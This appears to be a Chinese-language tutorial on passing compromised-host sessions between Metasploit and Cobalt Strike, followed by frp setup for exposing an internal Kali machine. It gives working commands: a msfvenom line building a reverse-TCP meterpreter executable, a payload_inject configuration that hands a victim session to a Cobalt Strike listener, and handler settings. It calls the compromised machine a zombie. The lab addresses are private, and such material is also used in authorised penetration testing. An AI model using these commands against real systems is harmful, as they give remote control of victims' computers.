CS与msf互传sessions

msf下的会话传给cs

首先在msf下获得一个meterpreter
可以通过msfvenom生成payload

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.10.41 LPORT=8888 -f exe > shell.exe

在目标主机执行shell,在攻击机监听对应主机端口即得到一个meterpreter

184069cbb5958df55caef85547984b3b.png

1、首先把msf上获取到的meterpreter挂在后台运行

执行命令:background,即可

2、然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中,具体命令如下:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.10.200    //cs主机地址
set LPORT  9999    //随意设置监听端口,需要和cs保持一致
set session 14    //设置需要派送的meterpreter
set DisablePayloadHandler true    //禁止产生一个新的handler
bd01c42324da6cc12dc5c41bcf26a517.png 

3、切换到cs中,建立监听

b0e0d44eb279129bdce82d12cb9799cf.png  

4、成功上线

再在msf中执行run,此时cs中肉鸡上线
2d038be4d1f35b48898b18fc5a83276f.png  

cs下的会话传给msf

首先在msf上监听自己的ip跟端口:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 接受的端口
exploit 执行
这里vps使用虚机centos 192.168.41.7
msf使用虚机kali 192.168.1.6

2194b916ff79222b75341713dfb24ddd.png  

然后cs那边创建一个foreign监听的listeners。

Listeners的ip为msf的ip,端口为msf监听的端口(注:如果msf是内网下的,则需要把端口映射到公网,或者使用ngrok等工具做流量转发)

然后,回到cs上,选中拿下的计算机会话,右键选中spawn,然后在弹出来的框中

2a2ba36ceebb421bb3b41f3906b28a7d.png  

选择刚刚创建的listeners监听器,然后执行。

此时,msf下即可看到已经拿到了一个新的会话。(需要等一会)

6ba440e7109a58bc6352dcce549b1d61.png  

值得注意的是,cs派送给msf的时候尽量选择tcp的payload去派送。

注意:前期利用的payload载荷一定要跟目标系统的系统位数一致,否则后面传递会话的时候会出现问题。

frp映射内网kali

kali内网地址192.168.1.6
vps地址192.168.1.7

说明:这里虽然两者在一网段,不过不影响我们实验!

1、在kali里配置frp

c4a2864c8ab2c1a0c2011a270c127a8f.png  

说明:这里local_ip是kali本身地址,也可以127.0.0.1
local_port =1266随便配置一个不常用端口
remote_port =1099 这个是要映射到vps上端口
执行./frpc -c ./frpc.ini